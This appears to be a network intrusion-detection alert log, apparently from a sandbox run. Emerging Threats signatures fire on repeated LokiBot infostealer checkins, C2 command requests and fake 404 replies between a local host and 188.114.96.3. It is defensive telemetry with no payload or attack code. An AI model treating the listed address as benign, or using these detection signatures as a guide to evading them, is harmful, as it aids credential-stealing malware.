2024-10-24T17:02:30.857303+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49798	188.114.96.3	80	TCP
2024-10-24T17:02:30.862976+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49798	TCP
2024-10-24T17:02:31.015360+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49806	188.114.96.3	80	TCP
2024-10-24T17:02:31.015360+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49806	188.114.96.3	80	TCP
2024-10-24T17:02:31.015360+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49806	188.114.96.3	80	TCP
2024-10-24T17:02:33.136591+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49806	188.114.96.3	80	TCP
2024-10-24T17:02:33.136591+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49806	188.114.96.3	80	TCP
2024-10-24T17:02:33.141972+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49806	TCP
2024-10-24T17:02:33.298933+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49820	188.114.96.3	80	TCP
2024-10-24T17:02:33.298933+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49820	188.114.96.3	80	TCP
2024-10-24T17:02:33.298933+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49820	188.114.96.3	80	TCP
2024-10-24T17:02:34.213681+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49820	188.114.96.3	80	TCP
2024-10-24T17:02:34.213681+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49820	188.114.96.3	80	TCP
2024-10-24T17:02:34.219047+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49820	TCP
2024-10-24T17:02:34.372256+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49826	188.114.96.3	80	TCP
2024-10-24T17:02:34.372256+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49826	188.114.96.3	80	TCP
2024-10-24T17:02:34.372256+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49826	188.114.96.3	80	TCP
2024-10-24T17:02:35.272272+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49826	188.114.96.3	80	TCP
2024-10-24T17:02:35.272272+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49826	188.114.96.3	80	TCP
2024-10-24T17:02:35.421423+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49832	188.114.96.3	80	TCP
2024-10-24T17:02:35.421423+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49832	188.114.96.3	80	TCP
2024-10-24T17:02:35.421423+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49832	188.114.96.3	80	TCP
2024-10-24T17:02:37.391379+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49832	188.114.96.3	80	TCP
2024-10-24T17:02:37.391379+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49832	188.114.96.3	80	TCP
2024-10-24T17:02:37.397824+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49832	TCP
2024-10-24T17:02:37.545568+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49845	188.114.96.3	80	TCP
2024-10-24T17:02:37.545568+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49845	188.114.96.3	80	TCP
2024-10-24T17:02:37.545568+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49845	188.114.96.3	80	TCP
2024-10-24T17:02:38.478307+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49845	188.114.96.3	80	TCP
2024-10-24T17:02:38.478307+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49845	188.114.96.3	80	TCP
2024-10-24T17:02:38.638011+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49853	188.114.96.3	80	TCP
2024-10-24T17:02:38.638011+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49853	188.114.96.3	80	TCP
2024-10-24T17:02:38.638011+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49853	188.114.96.3	80	TCP
2024-10-24T17:02:39.504866+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49853	188.114.96.3	80	TCP
2024-10-24T17:02:39.504866+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49853	188.114.96.3	80	TCP
2024-10-24T17:02:39.510265+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49853	TCP
2024-10-24T17:02:39.658318+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49859	188.114.96.3	80	TCP
2024-10-24T17:02:39.658318+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49859	188.114.96.3	80	TCP
2024-10-24T17:02:39.658318+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49859	188.114.96.3	80	TCP
2024-10-24T17:02:40.706963+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49859	188.114.96.3	80	TCP
2024-10-24T17:02:40.706963+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49859	188.114.96.3	80	TCP
2024-10-24T17:02:40.712629+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49859	TCP
2024-10-24T17:02:40.998847+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49866	188.114.96.3	80	TCP
2024-10-24T17:02:40.998847+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49866	188.114.96.3	80	TCP
2024-10-24T17:02:40.998847+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49866	188.114.96.3	80	TCP
2024-10-24T17:02:42.062394+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49866	188.114.96.3	80	TCP
2024-10-24T17:02:42.062394+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49866	188.114.96.3	80	TCP
2024-10-24T17:02:42.068199+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49866	TCP
2024-10-24T17:02:42.218170+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49875	188.114.96.3	80	TCP
2024-10-24T17:02:42.218170+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49875	188.114.96.3	80	TCP
2024-10-24T17:02:42.218170+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49875	188.114.96.3	80	TCP
2024-10-24T17:02:43.137633+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49875	188.114.96.3	80	TCP
2024-10-24T17:02:43.137633+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49875	188.114.96.3	80	TCP
2024-10-24T17:02:43.143302+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49875	TCP
2024-10-24T17:02:43.317732+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49881	188.114.96.3	80	TCP
2024-10-24T17:02:43.317732+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49881	188.114.96.3	80	TCP
2024-10-24T17:02:43.317732+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49881	188.114.96.3	80	TCP
2024-10-24T17:02:45.392280+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49881	188.114.96.3	80	TCP
2024-10-24T17:02:45.392280+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49881	188.114.96.3	80	TCP
2024-10-24T17:02:45.397964+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49881	TCP
2024-10-24T17:02:45.544944+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49893	188.114.96.3	80	TCP
2024-10-24T17:02:45.544944+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49893	188.114.96.3	80	TCP
2024-10-24T17:02:45.544944+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49893	188.114.96.3	80	TCP
2024-10-24T17:02:46.416414+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49893	188.114.96.3	80	TCP
2024-10-24T17:02:46.416414+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49893	188.114.96.3	80	TCP
2024-10-24T17:02:46.421855+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49893	TCP
2024-10-24T17:02:46.580422+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49899	188.114.96.3	80	TCP
2024-10-24T17:02:46.580422+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49899	188.114.96.3	80	TCP
2024-10-24T17:02:46.580422+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49899	188.114.96.3	80	TCP
2024-10-24T17:02:47.642217+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49899	188.114.96.3	80	TCP
2024-10-24T17:02:47.642217+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49899	188.114.96.3	80	TCP
2024-10-24T17:02:47.648909+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49899	TCP
2024-10-24T17:02:47.796961+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49907	188.114.96.3	80	TCP
2024-10-24T17:02:47.796961+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49907	188.114.96.3	80	TCP
2024-10-24T17:02:47.796961+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49907	188.114.96.3	80	TCP
2024-10-24T17:02:50.896699+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49907	188.114.96.3	80	TCP
2024-10-24T17:02:50.896699+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49907	188.114.96.3	80	TCP
2024-10-24T17:02:50.902069+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49907	TCP
2024-10-24T17:02:51.046250+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49925	188.114.96.3	80	TCP
2024-10-24T17:02:51.046250+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49925	188.114.96.3	80	TCP
2024-10-24T17:02:51.046250+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49925	188.114.96.3	80	TCP
2024-10-24T17:02:53.493288+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49925	188.114.96.3	80	TCP
2024-10-24T17:02:53.493288+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49925	188.114.96.3	80	TCP
2024-10-24T17:02:53.499004+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49925	TCP
2024-10-24T17:02:53.656102+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49941	188.114.96.3	80	TCP
2024-10-24T17:02:53.656102+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49941	188.114.96.3	80	TCP
2024-10-24T17:02:53.656102+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49941	188.114.96.3	80	TCP
2024-10-24T17:02:58.098284+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49941	188.114.96.3	80	TCP
2024-10-24T17:02:58.098284+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49941	188.114.96.3	80	TCP
2024-10-24T17:02:58.103765+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49941	TCP
2024-10-24T17:02:58.245581+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49963	188.114.96.3	80	TCP
2024-10-24T17:02:58.245581+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49963	188.114.96.3	80	TCP
2024-10-24T17:02:58.245581+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49963	188.114.96.3	80	TCP
2024-10-24T17:02:59.277600+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49963	188.114.96.3	80	TCP
2024-10-24T17:02:59.277600+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49963	188.114.96.3	80	TCP
2024-10-24T17:02:59.282996+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49963	TCP
2024-10-24T17:02:59.443401+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49968	188.114.96.3	80	TCP
2024-10-24T17:02:59.443401+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49968	188.114.96.3	80	TCP
2024-10-24T17:02:59.443401+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49968	188.114.96.3	80	TCP
2024-10-24T17:03:00.368673+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49968	188.114.96.3	80	TCP
2024-10-24T17:03:00.368673+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49968	188.114.96.3	80	TCP
2024-10-24T17:03:00.374881+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49968	TCP
2024-10-24T17:03:00.546134+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49972	188.114.96.3	80	TCP
2024-10-24T17:03:00.546134+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49972	188.114.96.3	80	TCP
2024-10-24T17:03:00.546134+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49972	188.114.96.3	80	TCP
2024-10-24T17:03:01.522800+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49972	188.114.96.3	80	TCP
2024-10-24T17:03:01.522800+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49972	188.114.96.3	80	TCP
2024-10-24T17:03:01.528668+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49972	TCP
2024-10-24T17:03:01.672985+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49976	188.114.96.3	80	TCP
2024-10-24T17:03:01.672985+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49976	188.114.96.3	80	TCP
2024-10-24T17:03:01.672985+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49976	188.114.96.3	80	TCP
2024-10-24T17:03:03.971789+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49976	188.114.96.3	80	TCP
2024-10-24T17:03:03.971789+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49976	188.114.96.3	80	TCP
2024-10-24T17:03:03.977388+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49976	TCP
2024-10-24T17:03:04.124054+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49980	188.114.96.3	80	TCP
2024-10-24T17:03:04.124054+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49980	188.114.96.3	80	TCP
2024-10-24T17:03:04.124054+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49980	188.114.96.3	80	TCP
2024-10-24T17:03:05.022507+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49980	188.114.96.3	80	TCP
2024-10-24T17:03:05.022507+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49980	188.114.96.3	80	TCP
2024-10-24T17:03:05.027946+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49980	TCP
2024-10-24T17:03:05.169370+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49983	188.114.96.3	80	TCP
2024-10-24T17:03:05.169370+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49983	188.114.96.3	80	TCP
2024-10-24T17:03:05.169370+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49983	188.114.96.3	80	TCP
2024-10-24T17:03:06.083279+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49983	188.114.96.3	80	TCP
2024-10-24T17:03:06.083279+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49983	188.114.96.3	80	TCP
2024-10-24T17:03:06.088782+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49983	TCP
2024-10-24T17:03:06.232216+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49987	188.114.96.3	80	TCP
2024-10-24T17:03:06.232216+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49987	188.114.96.3	80	TCP
2024-10-24T17:03:06.232216+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49987	188.114.96.3	80	TCP
2024-10-24T17:03:07.269902+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49987	188.114.96.3	80	TCP
2024-10-24T17:03:07.269902+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49987	188.114.96.3	80	TCP
2024-10-24T17:03:07.280784+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49987	TCP
2024-10-24T17:03:07.418539+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49990	188.114.96.3	80	TCP
2024-10-24T17:03:07.418539+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49990	188.114.96.3	80	TCP
2024-10-24T17:03:07.418539+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49990	188.114.96.3	80	TCP
2024-10-24T17:03:08.761558+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49990	188.114.96.3	80	TCP
2024-10-24T17:03:08.761558+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49990	188.114.96.3	80	TCP
2024-10-24T17:03:08.767099+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49990	TCP
2024-10-24T17:03:08.919860+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	49995	188.114.96.3	80	TCP
2024-10-24T17:03:08.919860+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	49995	188.114.96.3	80	TCP
2024-10-24T17:03:08.919860+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	49995	188.114.96.3	80	TCP
2024-10-24T17:03:11.602829+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	49995	188.114.96.3	80	TCP
2024-10-24T17:03:11.602829+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	49995	188.114.96.3	80	TCP
2024-10-24T17:03:11.609453+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	49995	TCP
2024-10-24T17:03:11.777745+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50002	188.114.96.3	80	TCP
2024-10-24T17:03:11.777745+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50002	188.114.96.3	80	TCP
2024-10-24T17:03:11.777745+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50002	188.114.96.3	80	TCP
2024-10-24T17:03:15.147284+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50002	188.114.96.3	80	TCP
2024-10-24T17:03:15.147284+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50002	188.114.96.3	80	TCP
2024-10-24T17:03:15.153010+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50002	TCP
2024-10-24T17:03:15.310031+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50010	188.114.96.3	80	TCP
2024-10-24T17:03:15.310031+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50010	188.114.96.3	80	TCP
2024-10-24T17:03:15.310031+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50010	188.114.96.3	80	TCP
2024-10-24T17:03:16.206577+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50010	188.114.96.3	80	TCP
2024-10-24T17:03:16.206577+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50010	188.114.96.3	80	TCP
2024-10-24T17:03:16.212370+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50010	TCP
2024-10-24T17:03:16.352682+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50013	188.114.96.3	80	TCP
2024-10-24T17:03:16.352682+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50013	188.114.96.3	80	TCP
2024-10-24T17:03:16.352682+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50013	188.114.96.3	80	TCP
2024-10-24T17:03:17.263597+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50013	188.114.96.3	80	TCP
2024-10-24T17:03:17.263597+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50013	188.114.96.3	80	TCP
2024-10-24T17:03:17.269422+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50013	TCP
2024-10-24T17:03:17.420331+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50019	188.114.96.3	80	TCP
2024-10-24T17:03:17.420331+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50019	188.114.96.3	80	TCP
2024-10-24T17:03:17.420331+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50019	188.114.96.3	80	TCP
2024-10-24T17:03:18.465606+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50019	188.114.96.3	80	TCP
2024-10-24T17:03:18.465606+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50019	188.114.96.3	80	TCP
2024-10-24T17:03:18.480624+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50019	TCP
2024-10-24T17:03:18.620369+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50022	188.114.96.3	80	TCP
2024-10-24T17:03:18.620369+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50022	188.114.96.3	80	TCP
2024-10-24T17:03:18.620369+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50022	188.114.96.3	80	TCP
2024-10-24T17:03:19.665855+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50022	188.114.96.3	80	TCP
2024-10-24T17:03:19.665855+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50022	188.114.96.3	80	TCP
2024-10-24T17:03:19.671516+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50022	TCP
2024-10-24T17:03:19.829825+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50023	188.114.96.3	80	TCP
2024-10-24T17:03:19.829825+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50023	188.114.96.3	80	TCP
2024-10-24T17:03:19.829825+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50023	188.114.96.3	80	TCP
2024-10-24T17:03:20.770740+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50023	188.114.96.3	80	TCP
2024-10-24T17:03:20.770740+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50023	188.114.96.3	80	TCP
2024-10-24T17:03:20.776248+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50023	TCP
2024-10-24T17:03:20.922651+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50024	188.114.96.3	80	TCP
2024-10-24T17:03:20.922651+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50024	188.114.96.3	80	TCP
2024-10-24T17:03:20.922651+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50024	188.114.96.3	80	TCP
2024-10-24T17:03:21.810046+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50024	188.114.96.3	80	TCP
2024-10-24T17:03:21.810046+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50024	188.114.96.3	80	TCP
2024-10-24T17:03:21.815600+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50024	TCP
2024-10-24T17:03:21.973153+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50025	188.114.96.3	80	TCP
2024-10-24T17:03:21.973153+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50025	188.114.96.3	80	TCP
2024-10-24T17:03:21.973153+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50025	188.114.96.3	80	TCP
2024-10-24T17:03:23.173241+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50025	188.114.96.3	80	TCP
2024-10-24T17:03:23.173241+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50025	188.114.96.3	80	TCP
2024-10-24T17:03:23.178818+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50025	TCP
2024-10-24T17:03:23.325611+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50026	188.114.96.3	80	TCP
2024-10-24T17:03:23.325611+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50026	188.114.96.3	80	TCP
2024-10-24T17:03:23.325611+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50026	188.114.96.3	80	TCP
2024-10-24T17:03:24.271557+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50026	188.114.96.3	80	TCP
2024-10-24T17:03:24.271557+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50026	188.114.96.3	80	TCP
2024-10-24T17:03:24.277018+0200	2025483	ET MALWARE LokiBot Fake 404 Response	1	188.114.96.3	80	192.168.2.5	50026	TCP
2024-10-24T17:03:24.421552+0200	2021641	ET MALWARE LokiBot User-Agent (Charon/Inferno)	1	192.168.2.5	50027	188.114.96.3	80	TCP
2024-10-24T17:03:24.421552+0200	2025381	ET MALWARE LokiBot Checkin	1	192.168.2.5	50027	188.114.96.3	80	TCP
2024-10-24T17:03:24.421552+0200	2825766	ETPRO MALWARE LokiBot Checkin M2	1	192.168.2.5	50027	188.114.96.3	80	TCP
2024-10-24T17:03:26.405618+0200	2024313	ET MALWARE LokiBot Request for C2 Commands Detected M1	1	192.168.2.5	50027	188.114.96.3	80	TCP
2024-10-24T17:03:26.405618+0200	2024318	ET MALWARE LokiBot Request for C2 Commands Detected M2	1	192.168.2.5	50027	188.114.96.3	80	TCP
